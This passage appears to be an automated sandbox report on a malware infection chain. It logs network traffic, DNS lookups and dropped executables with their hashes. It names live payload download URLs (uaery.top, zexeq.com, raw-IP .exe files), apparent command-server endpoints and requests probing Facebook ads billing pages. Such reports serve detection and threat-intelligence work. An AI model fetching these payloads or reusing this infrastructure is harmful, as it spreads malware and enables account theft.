• 157.240.5.35:443 | https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing | proto: tls, http | process: ss31.exe | sent 6.8kB in 63 packets, received 149.3kB in 118 packets
    GET https://www.facebook.com/ads/manager/account_settings/account_billing -> 302
    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing -> 200
    GET https://www.facebook.com/ads/manager/account_settings/account_billing -> 302
    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing -> 200
• 157.240.5.35:443 | https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing | proto: tls, http | process: ss31.exe | sent 6.8kB in 64 packets, received 149.4kB in 119 packets
    GET https://www.facebook.com/ads/manager/account_settings/account_billing -> 302
    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing -> 200
    GET https://www.facebook.com/ads/manager/account_settings/account_billing -> 302
    GET https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing -> 200
• 77.91.84.172:80 | http://77.91.84.172/s.exe | proto: http | sent 6.4kB in 135 packets, received 348.3kB in 264 packets
    GET http://77.91.84.172/s.exe -> 200
• 45.66.159.179:80 | http://count.iiagjaggg.com/check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db | proto: http | process: ss31.exe | sent 2.2kB in 13 packets, received 1.5kB in 10 packets
    GET http://count.iiagjaggg.com/check/safe -> 200
    POST http://count.iiagjaggg.com/check/?sid=295279&key=1395450b12c9ce7aa49d89a66f4c318f -> 200
    GET http://count.iiagjaggg.com/check/safe -> 200
    POST http://count.iiagjaggg.com/check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db -> 200
• 45.66.159.179:80 | http://count.iiagjaggg.com/check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10 | proto: http | process: ss31.exe | sent 2.2kB in 12 packets, received 1.5kB in 10 packets
    GET http://count.iiagjaggg.com/check/safe -> 200
    POST http://count.iiagjaggg.com/check/?sid=295281&key=245e0e54c838d36f90ed8c7aa82720b5 -> 200
    GET http://count.iiagjaggg.com/check/safe -> 200
    POST http://count.iiagjaggg.com/check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10 -> 200
• 8.238.21.126:80 | sent 322 B in 7 packets
• 162.0.217.254:443 | api.2ip.ua | process: D892.exe | sent 156 B in 3 packets
• 162.0.217.254:443 | api.2ip.ua | process: DBEE.exe | sent 156 B in 3 packets
• 208.95.112.1:80 | http://ip-api.com/json/?fields=8198 | proto: http | process: WspService | sent 1.2kB in 8 packets, received 911 B in 5 packets
    GET http://ip-api.com/json/?fields=8198 -> 200
    GET http://ip-api.com/json/?fields=8198 -> 200
    GET http://ip-api.com/json/?fields=8198 -> 200
• 104.21.26.69:443 | https://h.ffbbhhtt.com/api6.php | proto: tls, http | process: WspService | sent 1.5kB in 13 packets, received 4.3kB in 10 packets
    POST https://h.ffbbhhtt.com/api6.php -> 200
• 104.21.26.69:443 | https://h.ffbbhhtt.com/api6.php | proto: tls, http | process: WspService | sent 1.4kB in 8 packets, received 1.1kB in 6 packets
    POST https://h.ffbbhhtt.com/api6.php -> 200
• 104.21.26.69:443 | https://h.ffbbhhtt.com/api6.php | proto: tls, http | process: WspService | sent 1.4kB in 8 packets, received 1.2kB in 6 packets
    POST https://h.ffbbhhtt.com/api6.php -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 801 B in 6 packets, received 465 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 774 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 34.80.59.191:80 | http://34.80.59.191/win.pac | proto: http | sent 447 B in 7 packets, received 718 B in 5 packets
    GET http://34.80.59.191/win.pac -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 822 B in 6 packets, received 502 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 162.0.217.254:443 | api.2ip.ua | process: 7C6.exe | sent 156 B in 3 packets
• 190.211.254.211:80 | http://190.211.254.211/vokka.exe | proto: http | sent 72.2kB in 1285 packets, received 2.9MB in 2706 packets
    GET http://190.211.254.211/vokka.exe -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 845 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 735 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 881 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 724 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 835 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 721 B in 7 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 732 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 748 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 707 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 762 B in 6 packets, received 450 B in 5 packets
    POST http://vispik.at/tmp/ -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 692 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 104.234.147.45:443 | https://104.234.147.45/6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8= | proto: tls, http | process: rundll32.exe | sent 135.1kB in 2867 packets, received 4.0MB in 2863 packets
    GET https://104.234.147.45/6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8= -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 715 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 669 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 185.95.186.58:80 | http://uaery.top/dl/build2.exe | proto: http | process: D892.exe | sent 22.9kB in 366 packets, received 490.7kB in 365 packets
    GET http://uaery.top/dl/build2.exe -> 200
• 109.206.243.140:80 | http://hoh0aeghwugh2gie.com/ | proto: http | sent 3.7kB in 66 packets, received 166.2kB in 124 packets
    POST http://hoh0aeghwugh2gie.com/ -> 404
• 203.91.116.53:80 | http://zexeq.com/test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true | proto: http | process: D892.exe | sent 413 B in 6 packets, received 975 B in 5 packets
    GET http://zexeq.com/test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 847 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
• 185.95.186.58:80 | http://uaery.top/dl/build2.exe | proto: http | process: DBEE.exe | sent 20.4kB in 354 packets, received 488.9kB in 353 packets
    GET http://uaery.top/dl/build2.exe -> 200
• 203.91.116.53:80 | http://zexeq.com/lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false | proto: http | process: DBEE.exe | sent 415 B in 6 packets, received 979 B in 5 packets
    GET http://zexeq.com/lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false -> 200
• 176.226.127.181:80 | http://vispik.at/tmp/ | proto: http | sent 819 B in 6 packets, received 790 B in 5 packets
    POST http://vispik.at/tmp/ -> 404
                                  • 176.226.127.181:80
                                    http://vispik.at/tmp/
                                    http
                                    848 B
                                    790 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://vispik.at/tmp/

                                    HTTP Response

                                    404
                                  • 203.91.116.53:80
                                    http://zexeq.com/files/1/build3.exe
                                    http
                                    D892.exe
                                    646 B
                                    10.5kB
                                    12
                                    11

                                    HTTP Request

                                    GET http://zexeq.com/files/1/build3.exe

                                    HTTP Response

                                    200
                                  • 149.154.167.99:443
                                    https://t.me/zaskullz
                                    tls, http
                                    build2.exe
                                    1.5kB
                                    19.4kB
                                    23
                                    20

                                    HTTP Request

                                    GET https://t.me/zaskullz

                                    HTTP Response

                                    200
                                  • 203.91.116.53:80
                                    http://zexeq.com/files/1/build3.exe
                                    http
                                    DBEE.exe
                                    646 B
                                    10.5kB
                                    12
                                    11

                                    HTTP Request

                                    GET http://zexeq.com/files/1/build3.exe

                                    HTTP Response

                                    200
                                  • 116.203.13.130:80
                                    http://116.203.13.130/edit.zip
                                    http
                                    build2.exe
                                    91.5kB
                                    2.8MB
                                    1980
                                    1979

                                    HTTP Request

                                    GET http://116.203.13.130/

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET http://116.203.13.130/edit.zip

                                    HTTP Response

                                    200
                                  • 185.95.186.58:80
                                    http://uaery.top/dl/build2.exe
                                    http
                                    7C6.exe
                                    21.2kB
                                    487.8kB
                                    361
                                    360

                                    HTTP Request

                                    GET http://uaery.top/dl/build2.exe

                                    HTTP Response

                                    200
                                  • 203.91.116.53:80
                                    http://zexeq.com/files/1/build3.exe
                                    http
                                    7C6.exe
                                    646 B
                                    10.5kB
                                    12
                                    11

                                    HTTP Request

                                    GET http://zexeq.com/files/1/build3.exe

                                    HTTP Response

                                    200
                                  • 127.0.0.1:24140
                                    rundll32.exe
                                    (22 identical connection records)
                                  • 127.0.0.1:1312
                                    rundll32.exe
                                    (21 identical connection records)
                                  • 8.8.8.8:53
                                    potunulit.org
                                    dns
                                    59 B
                                    91 B
                                    1
                                    1

                                    DNS Request

                                    potunulit.org

                                    DNS Response

                                    172.67.181.144
                                    104.21.18.99

                                  • 8.8.8.8:53
                                    uaery.top
                                    dns
                                    7C6.exe
                                    55 B
                                    215 B
                                    1
                                    1

                                    DNS Request

                                    uaery.top

                                    DNS Response

                                    185.95.186.58
                                    187.170.21.149
                                    211.40.39.251
                                    211.104.254.139
                                    190.229.19.7
                                    178.30.120.200
                                    187.224.55.97
                                    211.119.84.112
                                    195.158.3.162
                                    175.120.254.9

                                  • 8.8.8.8:53
                                    144.181.67.172.in-addr.arpa
                                    dns
                                    73 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    144.181.67.172.in-addr.arpa

                                  • 8.8.8.8:53
                                    58.186.95.185.in-addr.arpa
                                    dns
                                    72 B
                                    132 B
                                    1
                                    1

                                    DNS Request

                                    58.186.95.185.in-addr.arpa

                                  • 8.8.8.8:53
                                    api.2ip.ua
                                    dns
                                    7C6.exe
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    api.2ip.ua

                                    DNS Response

                                    162.0.217.254

                                  • 8.8.8.8:53
                                    80.74.9.45.in-addr.arpa
                                    dns
                                    69 B
                                    123 B
                                    1
                                    1

                                    DNS Request

                                    80.74.9.45.in-addr.arpa

                                  • 8.8.8.8:53
                                    akar.av.tr
                                    dns
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    akar.av.tr

                                    DNS Response

                                    159.253.45.38

                                  • 8.8.8.8:53
                                    bz.bbbeioaag.com
                                    dns
                                    ss31.exe
                                    62 B
                                    78 B
                                    1
                                    1

                                    DNS Request

                                    bz.bbbeioaag.com

                                    DNS Response

                                    45.136.113.107

                                  • 8.8.8.8:53
                                    38.45.253.159.in-addr.arpa
                                    dns
                                    72 B
                                    132 B
                                    1
                                    1

                                    DNS Request

                                    38.45.253.159.in-addr.arpa

                                  • 8.8.8.8:53
                                    j.ffbbjjkk.com
                                    dns
                                    zyy.exe
                                    60 B
                                    92 B
                                    1
                                    1

                                    DNS Request

                                    j.ffbbjjkk.com

                                    DNS Response

                                    172.67.158.22
                                    104.21.8.227

                                  • 8.8.8.8:53
                                    22.158.67.172.in-addr.arpa
                                    dns
                                    72 B
                                    134 B
                                    1
                                    1

                                    DNS Request

                                    22.158.67.172.in-addr.arpa

                                  • 8.8.8.8:53
                                    107.113.136.45.in-addr.arpa
                                    dns
                                    73 B
                                    122 B
                                    1
                                    1

                                    DNS Request

                                    107.113.136.45.in-addr.arpa

                                  • 8.8.8.8:53
                                    y1.ffbbyykk.com
                                    dns
                                    WspService
                                    61 B
                                    77 B
                                    1
                                    1

                                    DNS Request

                                    y1.ffbbyykk.com

                                    DNS Response

                                    34.142.181.181

                                  • 8.8.8.8:53
                                    y1.ffbbyykk.com
                                    dns
                                    WspService
                                    61 B
                                    120 B
                                    1
                                    1

                                    DNS Request

                                    y1.ffbbyykk.com

                                  • 34.142.181.181:53
                                    y1.ffbbyykk.com
                                    WspService
                                    75.8kB
                                    807.1kB
                                    1445
                                    1457
                                  • 8.8.8.8:53
                                    52.4.107.13.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    52.4.107.13.in-addr.arpa

                                  • 8.8.8.8:53
                                    181.181.142.34.in-addr.arpa
                                    dns
                                    73 B
                                    126 B
                                    1
                                    1

                                    DNS Request

                                    181.181.142.34.in-addr.arpa

                                  • 8.8.8.8:53
                                    ebfertility.com
                                    dns
                                    61 B
                                    77 B
                                    1
                                    1

                                    DNS Request

                                    ebfertility.com

                                    DNS Response

                                    89.190.157.61

                                  • 8.8.8.8:53
                                    61.157.190.89.in-addr.arpa
                                    dns
                                    72 B
                                    132 B
                                    1
                                    1

                                    DNS Request

                                    61.157.190.89.in-addr.arpa

                                  • 8.8.8.8:53
                                    www.facebook.com
                                    dns
                                    ss31.exe
                                    62 B
                                    107 B
                                    1
                                    1

                                    DNS Request

                                    www.facebook.com

                                    DNS Response

                                    157.240.5.35

                                  • 8.8.8.8:53
                                    count.iiagjaggg.com
                                    dns
                                    ss31.exe
                                    65 B
                                    81 B
                                    1
                                    1

                                    DNS Request

                                    count.iiagjaggg.com

                                    DNS Response

                                    45.66.159.179

                                  • 8.8.8.8:53
                                    35.5.240.157.in-addr.arpa
                                    dns
                                    71 B
                                    124 B
                                    1
                                    1

                                    DNS Request

                                    35.5.240.157.in-addr.arpa

                                  • 8.8.8.8:53
                                    172.84.91.77.in-addr.arpa
                                    dns
                                    71 B
                                    105 B
                                    1
                                    1

                                    DNS Request

                                    172.84.91.77.in-addr.arpa

                                  • 8.8.8.8:53
                                    179.159.66.45.in-addr.arpa
                                    dns
                                    72 B
                                    120 B
                                    1
                                    1

                                    DNS Request

                                    179.159.66.45.in-addr.arpa

                                  • 8.8.8.8:53
                                    ip-api.com
                                    dns
                                    WspService
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    ip-api.com

                                    DNS Response

                                    208.95.112.1

                                  • 8.8.8.8:53
                                    h.ffbbhhtt.com
                                    dns
                                    WspService
                                    60 B
                                    92 B
                                    1
                                    1

                                    DNS Request

                                    h.ffbbhhtt.com

                                    DNS Response

                                    104.21.26.69
                                    172.67.168.62

                                  • 8.8.8.8:53
                                    1.112.95.208.in-addr.arpa
                                    dns
                                    71 B
                                    95 B
                                    1
                                    1

                                    DNS Request

                                    1.112.95.208.in-addr.arpa

                                  • 8.8.8.8:53
                                    69.26.21.104.in-addr.arpa
                                    dns
                                    71 B
                                    133 B
                                    1
                                    1

                                    DNS Request

                                    69.26.21.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    126.135.241.8.in-addr.arpa
                                    dns
                                    72 B
                                    126 B
                                    1
                                    1

                                    DNS Request

                                    126.135.241.8.in-addr.arpa

                                  • 8.8.8.8:53
                                    76.38.195.152.in-addr.arpa
                                    dns
                                    72 B
                                    143 B
                                    1
                                    1

                                    DNS Request

                                    76.38.195.152.in-addr.arpa

                                  • 8.8.8.8:53
                                    vispik.at
                                    dns
                                    55 B
                                    215 B
                                    1
                                    1

                                    DNS Request

                                    vispik.at

                                    DNS Response

                                    176.226.127.181
                                    222.236.49.124
                                    190.229.19.7
                                    211.53.230.67
                                    123.140.161.243
                                    187.245.185.123
                                    187.224.55.97
                                    195.158.3.162
                                    86.122.83.142
                                    187.156.88.173

                                  • 8.8.8.8:53
                                    181.127.226.176.in-addr.arpa
                                    dns
                                    74 B
                                    123 B
                                    1
                                    1

                                    DNS Request

                                    181.127.226.176.in-addr.arpa

                                  • 8.8.8.8:53
                                    191.59.80.34.in-addr.arpa
                                    dns
                                    71 B
                                    122 B
                                    1
                                    1

                                    DNS Request

                                    191.59.80.34.in-addr.arpa

                                  • 8.8.8.8:53
                                    211.254.211.190.in-addr.arpa
                                    dns
                                    74 B
                                    113 B
                                    1
                                    1

                                    DNS Request

                                    211.254.211.190.in-addr.arpa

                                  • 8.8.8.8:53
                                    zexeq.com
                                    dns
                                    7C6.exe
                                    55 B
                                    215 B
                                    1
                                    1

                                    DNS Request

                                    zexeq.com

                                    DNS Response

                                    203.91.116.53
                                    190.141.123.88
                                    211.53.230.67
                                    178.30.120.200
                                    86.122.83.142
                                    187.156.88.173
                                    211.40.39.251
                                    175.126.109.15
                                    211.171.233.126
                                    58.235.189.192

                                  • 8.8.8.8:53
                                    hoh0aeghwugh2gie.com
                                    dns
                                    66 B
                                    82 B
                                    1
                                    1

                                    DNS Request

                                    hoh0aeghwugh2gie.com

                                    DNS Response

                                    109.206.243.140

                                  • 8.8.8.8:53
                                    45.147.234.104.in-addr.arpa
                                    dns
                                    73 B
                                    139 B
                                    1
                                    1

                                    DNS Request

                                    45.147.234.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    140.243.206.109.in-addr.arpa
                                    dns
                                    74 B
                                    149 B
                                    1
                                    1

                                    DNS Request

                                    140.243.206.109.in-addr.arpa

                                  • 8.8.8.8:53
                                    53.116.91.203.in-addr.arpa
                                    dns
                                    72 B
                                    160 B
                                    1
                                    1

                                    DNS Request

                                    53.116.91.203.in-addr.arpa

                                  • 8.8.8.8:53
                                    t.me
                                    dns
                                    build2.exe
                                    50 B
                                    66 B
                                    1
                                    1

                                    DNS Request

                                    t.me

                                    DNS Response

                                    149.154.167.99

                                  • 8.8.8.8:53
                                    99.167.154.149.in-addr.arpa
                                    dns
                                    73 B
                                    166 B
                                    1
                                    1

                                    DNS Request

                                    99.167.154.149.in-addr.arpa

                                  • 8.8.8.8:53
                                    22.249.124.192.in-addr.arpa
                                    dns
                                    73 B
                                    113 B
                                    1
                                    1

                                    DNS Request

                                    22.249.124.192.in-addr.arpa

                                  • 8.8.8.8:53
                                    130.13.203.116.in-addr.arpa
                                    dns
                                    73 B
                                    131 B
                                    1
                                    1

                                    DNS Request

                                    130.13.203.116.in-addr.arpa

                                  • 8.8.8.8:53
                                    50.4.107.13.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    50.4.107.13.in-addr.arpa

                                  MITRE ATT&CK Enterprise v6

                                  Downloads

                                  • C:\SystemID\PersonalID.txt

                                    Filesize

                                    84B

                                    MD5

                                    8a336d5bff8f129e980f6d2038544ccb

                                    SHA1

                                    5238d75ab615dcdd09eef84e8f93f42bd7a1a37b

                                    SHA256

                                    63faf4362c0b32dc765847896fdb1484957c29a92a4b601ba573e85c784faacd

                                    SHA512

                                    83178f9fa1e0c8878f486923f1d6f3b007c565b10e3bfdf4818afb188c339ff9674bbf35bef74b017b1e081cf434ed823b5e3461f06c3d0d4faf1da98195af47

                                  • C:\Users\Admin\AppData\Local\0b95f0a2-0096-4715-9678-79624e8cd7f9\D892.exe

                                    Filesize

                                    790KB

                                    MD5

                                    7e79fbc05e59e5b7e91ebd0c5a2efe78

                                    SHA1

                                    8d0c7ca5e6e97cdf369238f2d2f40182793810ee

                                    SHA256

                                    56221b7ad16a9c49d02a3916fba76504b9e4d66d9150b7e882f9a0747208ec80

                                    SHA512

                                    bd8005e66585f78bc5146431682738e33488a59348c6f4fbcffe96c6182506f61e2367846e7e950c3f4f92d639d94c26ab105276de3c07a5085e10785e48503d

                                  • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe

                                    Filesize

                                    462KB

                                    MD5

                                    1ea00519a643ae1ab0f4f9a6ecc81ead

                                    SHA1

                                    551c4fd300092a51a7fd3ceee009db249fd2a70f

                                    SHA256

                                    04e8128c405994d18f26b6394b32686c6e07a65b2c90c98f16295a48a16ba683

                                    SHA512

                                    187897c856c6b7b45d9f85898103b8560d25c694c150c1c1efd1370be0c4e3ba3799d2f4c3cc5c2618b0a84f80cff19cf9be47d0961df20c47b73783f6d0491d

                                  • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build3.exe

                                    Filesize

                                    9KB

                                    MD5

                                    9ead10c08e72ae41921191f8db39bc16

                                    SHA1

                                    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                    SHA256

                                    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                    SHA512

                                    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                  • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe

                                    Filesize

                                    462KB

                                    MD5

                                    1ea00519a643ae1ab0f4f9a6ecc81ead

                                    SHA1

                                    551c4fd300092a51a7fd3ceee009db249fd2a70f

                                    SHA256

                                    04e8128c405994d18f26b6394b32686c6e07a65b2c90c98f16295a48a16ba683

                                    SHA512

                                    187897c856c6b7b45d9f85898103b8560d25c694c150c1c1efd1370be0c4e3ba3799d2f4c3cc5c2618b0a84f80cff19cf9be47d0961df20c47b73783f6d0491d

                                  • C:\Users\Admin\AppData\Local\Temp\10DF.exe

                                    Filesize

                                    354KB

                                    MD5

                                    029df110444ab7746911e96d1febee72

                                    SHA1

                                    26e77a415e8daea0008f8fc48de5591ed69e5a8c

                                    SHA256

                                    4248d58d86cfd2a671e4323f57993f95e193c94d8c33ccb7219800bacefa95a6

                                    SHA512

                                    38b91ecd85efd99f7d45ed46fb6a8c310ed3e4468ebf2ec406025921fba82005a646c9ff04b3ef759ba089ad0e855deaf6950c5a02c82b95fceb4945d40904e7

                                  • C:\Users\Admin\AppData\Local\Temp\147A.exe

                                    Filesize

                                    354KB

                                    MD5

                                    056d73be069d88974d2d40c5c61d21b3

                                    SHA1

                                    2c01cf4481fe83bcedbb54f0dcd96ec2b6af6fe8

                                    SHA256

                                    2dcef02427419448257ec0e2b63ee8554bcc04b74452cd6e27b5d12ca948ada8

                                    SHA512

                                    4b04250776f5f9d0f3a9800b625f24f529db5cd3d1d6ce4d526f2fe7e2839e4c7d3ba12e5827d0c21d698a1c7453e6deeaaf403c7dc008901ca7821b288f9a8a

                                  • C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe

                                    Filesize

                                    244KB

                                    MD5

                                    43a3e1c9723e124a9b495cd474a05dcb

                                    SHA1

                                    d293f427eaa8efc18bb8929a9f54fb61e03bdd89

                                    SHA256

                                    619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

                                    SHA512

                                    6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

                                  • C:\Users\Admin\AppData\Local\Temp\1A67.exe

                                    Filesize

                                    329KB

                                    MD5

                                    6e195bf95f1e6df5c96e31fa17d32c08

                                    SHA1

                                    2052fb8a54d776d48263bf7d7f0c397041108a1a

                                    SHA256

                                    595d22d790f57e4622d9583ae1544af1b2d445a95b760cb6e50f9d4d3b114e30

                                    SHA512

                                    cf1d92fa9ce81df1b69a597bbfc41ac9f522f6931f50a0c0648bb8d5dd53e75830dc3703c91820fd772f429c55336162c5eb248fddde9acb60b0136f1f368fe7

                                  • C:\Users\Admin\AppData\Local\Temp\1C2D.exe

                                    Filesize

                                    290KB

                                    MD5

                                    b57ebfe79d0d226ccc1961db4d90dea3

                                    SHA1

                                    5a44539618d935eeb19548d6d95342152ba32e22

                                    SHA256

                                    3d4b51afefb80ed6ef1dea05d417da49acfdf2cab7dabcd25038d77891eb0e17

                                    SHA512

                                    83573939bd3301c519c9ba2bda76dbe91fa8f3d4ebdd246e8ee57e7c94f7770d0a10f3f08efa426357d444b74a05c5179f5b80cd05125eaa2b6f13e95701aef7

                                  • C:\Users\Admin\AppData\Local\Temp\72E9.exe

                                    Filesize

                                    2.7MB

                                    MD5

                                    2a198922c89517c56edeab275cd2e3f1

                                    SHA1

                                    4ed3ec9b2b408a18ad8677465eb8a24806c2879e

                                    SHA256

                                    df348654dd69ac181f4979309fb71b103615694aa95021a9689c58ce6f376972

                                    SHA512

                                    c0d4b18def3a5e5571f809e00c3db324cf264ffb8dce4daeb59e6a4ba157bd60321223048d5173266def4c5fbbd2fdce2521cc0e1dfab80dc399b51d15fefb9b

                                  • C:\Users\Admin\AppData\Local\Temp\7C6.exe

                                    Filesize

                                    790KB

                                    MD5

                                    7e79fbc05e59e5b7e91ebd0c5a2efe78

                                    SHA1

                                    8d0c7ca5e6e97cdf369238f2d2f40182793810ee

                                    SHA256

                                    56221b7ad16a9c49d02a3916fba76504b9e4d66d9150b7e882f9a0747208ec80

                                    SHA512

                                    bd8005e66585f78bc5146431682738e33488a59348c6f4fbcffe96c6182506f61e2367846e7e950c3f4f92d639d94c26ab105276de3c07a5085e10785e48503d

                                  • C:\Users\Admin\AppData\Local\Temp\D892.exe

                                    Filesize

                                    790KB

                                    MD5

                                    7e79fbc05e59e5b7e91ebd0c5a2efe78

                                    SHA1

                                    8d0c7ca5e6e97cdf369238f2d2f40182793810ee

                                    SHA256

                                    56221b7ad16a9c49d02a3916fba76504b9e4d66d9150b7e882f9a0747208ec80

                                    SHA512

                                    bd8005e66585f78bc5146431682738e33488a59348c6f4fbcffe96c6182506f61e2367846e7e950c3f4f92d639d94c26ab105276de3c07a5085e10785e48503d

                                  • C:\Users\Admin\AppData\Local\Temp\DBEE.exe

                                    Filesize

                                    831KB

                                    MD5

                                    b073a0924e56a5e3b61b34ce8fa16477

                                    SHA1

                                    349b64cd44b4985b19dd39899fa946a2187986ad

                                    SHA256

                                    99e5fe1fdea74aa190a4eb9469ca47e7a780eb8409278bee240b5b872b8e3d3e

                                    SHA512

                                    ecc3a1d7003c60a1a744da9e64fa78c6db2db529291218ab84a1309849534fe6a8b59a1f0de3f679b201db62fc807837ef5c4f9edd5b96113d2870857e027b0e

                                  • C:\Users\Admin\AppData\Local\Temp\ED55.exe

                                    Filesize

                                    1.5MB

                                    MD5

                                    9b8786c9e74cfd314d7fe9fab571d451

                                    SHA1

                                    e5725184c2da0103046f44c211cc943582c1b2b2

                                    SHA256

                                    d3e1e0659ff9d7843f91e722d6e94cff0cbf891ab115b7dc23bde7c52a9ead09

                                    SHA512

                                    9400e778bf8e57a9bcb9593f762f2473084ed06d04bf6d90566ab17019b0dd8c03f4a6190f72eeeb94fe1d0acf5d42223735d625a2a935a21d61182acef827d9

                                  • C:\Users\Admin\AppData\Local\Temp\F053.exe

                                    Filesize

                                    1.5MB

                                    MD5

                                    9b8786c9e74cfd314d7fe9fab571d451

                                    SHA1

                                    e5725184c2da0103046f44c211cc943582c1b2b2

                                    SHA256

                                    d3e1e0659ff9d7843f91e722d6e94cff0cbf891ab115b7dc23bde7c52a9ead09

                                    SHA512

                                    9400e778bf8e57a9bcb9593f762f2473084ed06d04bf6d90566ab17019b0dd8c03f4a6190f72eeeb94fe1d0acf5d42223735d625a2a935a21d61182acef827d9

                                  • C:\Users\Admin\AppData\Local\Temp\F65F.exe

                                    Filesize

                                    329KB

                                    MD5

                                    545746a5016236cfc019f89f921da346

                                    SHA1

                                    40a1f932374625dc1e703edf1930f5c888eda098

                                    SHA256

                                    253abf08a328cbf2b44f7a9f527b0e05371f4c4fd6b34a9956cee3f03210f444

                                    SHA512

                                    5559885fcc749f34377ccb093c5963f06b733353f20985a6dcb6f93c0ff1a727993b004c4e85e7b876b26f0b1eb4201d4e1bf69ed7c76e9f0c6bae3cf14ecb95

                                  • C:\Users\Admin\AppData\Local\Temp\F835.exe

                                    Filesize

                                    291KB

                                    MD5

                                    e17c61b04f93d648e082a5c3be2494bd

                                    SHA1

                                    c3f3401e14ead7ac00413e5206d75e18112ba5cd

                                    SHA256

                                    56041d4fbc7afa0874e80a4f47f37139acc8938cc54fe79657a50c023cf4b94a

                                    SHA512

